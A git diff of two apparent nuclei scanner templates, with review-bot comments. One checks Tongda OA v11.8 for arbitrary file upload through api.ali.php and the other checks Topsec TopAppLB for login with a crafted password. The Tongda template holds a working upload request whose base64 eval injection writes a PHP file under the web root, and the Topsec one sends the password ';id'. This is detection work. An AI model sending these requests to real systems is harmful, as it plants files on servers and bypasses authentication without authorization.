Updated
parent
0aab17e06c
commit
33bf8b7cb2
|
@ -1,12 +1,17 @@
|
|||
id: tongda-oa-api-ali-arbitrary-file-upload
|
||||
id: tongda-api-arbitrary-file-upload
|
||||
|
||||
info:
|
||||
name: tongda-oa-api-ali-arbitrary-file-upload
|
||||
name: Tongda OA v11.8 api.ali.php - Arbitrary File Upload
|
||||
author: SleepingBag945
|
||||
severity: critical
|
||||
description: 通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器
|
||||
description: |
|
||||
Tongda OA v11.8 api.ali.php has an arbitrary file upload vulnerability. An attacker can upload malicious files to control the server through the vulnerability.
|
||||
reference:
|
||||
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20api.ali.php%20任意文件上传漏洞.html
|
||||
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-api-ali-upload.yaml
|
||||
metadata:
|
||||
max-request: 1
|
||||
fofa-query: app="TDXK-通达OA"
|
||||
verified: true
|
||||
tags: tongda,oa
|
||||
|
||||
http:
|
||||
|
@ -18,7 +23,7 @@ http:
|
|||
Accept-Encoding: gzip
|
||||
|
||||
--502f67681799b07e5de6b503655f5cae
|
||||
Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
|
||||
Content-Disposition: form-data; name="file"; filename="{{randstr}}.json"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{"a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"}
|
||||
|
@ -30,16 +35,13 @@ http:
|
|||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
- |
|
||||
GET /fb6790f4.php HTTP/1.1
|
||||
GET /{{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
|
||||
# req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_1 == 200'
|
||||
- 'status_code_2 == 200 && contains(body_2,"OK")'
|
||||
- 'status_code_3 == 200 && contains(body_3,"phpinfo")'
|
||||
- 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200'
|
||||
- 'contains(body_2,"OK") && contains(body_3,"phpinfo")'
|
||||
condition: and
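Review bot: The upload body and the follow-up request no longer agree on a file name. The multipart filename and the third request now use `{{randstr}}`, but the unchanged base64 `a` value in the JSON body still decodes to a write of the fixed name `fb6790f4.php`, so `status_code_3 == 200` is unlikely to hold and a vulnerable host would be reported clean. The encoded value should be built from the same variable, for example with the `base64()` helper, instead of being kept as a literal. The second request is outside the visible hunks, so check that its path follows `{{randstr}}` as well. Because this check writes a file under the web root, I would also change the tag line to `tags: tongda,oa,fileupload,intrusive` and set `max-request: 3`, so operators can exclude it from non-intrusive scans.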
|
|
@ -1,12 +1,17 @@
|
|||
id: topsec-topapplb-arbitrary-user-login
|
||||
id: topsec-topapplb-arbitrary-login
|
||||
|
||||
info:
|
||||
name: Topsec TopAppLB Any account Login
|
||||
name: Topsec TopAppLB Any account Login - Arbitrary Login
|
||||
author: SleepingBag945
|
||||
severity: critical
|
||||
severity: high
|
||||
description: |
|
||||
Any Account can log in to the background
|
||||
tags: defaultaccount
|
||||
Any Account can log in to the background.Enter any account on the login page, the password is ;id
|
||||
reference:
|
||||
- https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
|
||||
metadata:
|
||||
max-request: 1
|
||||
fofa-query: title="TopApp-LB 负载均衡系统"
|
||||
tags: topsec,topapplb,misconfig
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -14,7 +19,6 @@ http:
|
|||
POST /login_check.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: navigate
|
||||
|
@ -25,9 +29,8 @@ http:
|
|||
|
||||
userName=admin&password=%3Bid
|
||||
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_1 == 302 && contains(header_1,"redirect.php")'
|
||||
condition: and
|
||||
condition: and
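Review bot: The new `tags: topsec,topapplb,misconfig` line classifies this as a misconfiguration, while the description and the request body (`password=%3Bid`) describe a login check that accepts a crafted password for any account. `tags: topsec,topapplb,auth-bypass` would match what the template tests and keep findings in the right triage bucket. The single matcher accepts any 302 whose headers contain `redirect.php`; if a rejected login on this product also redirects there, the template will flag patched hosts, so confirm against a failed login and add a negative condition. In the description, `background.Enter` is missing a space, and the name repeats itself (`Any account Login - Arbitrary Login`).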
|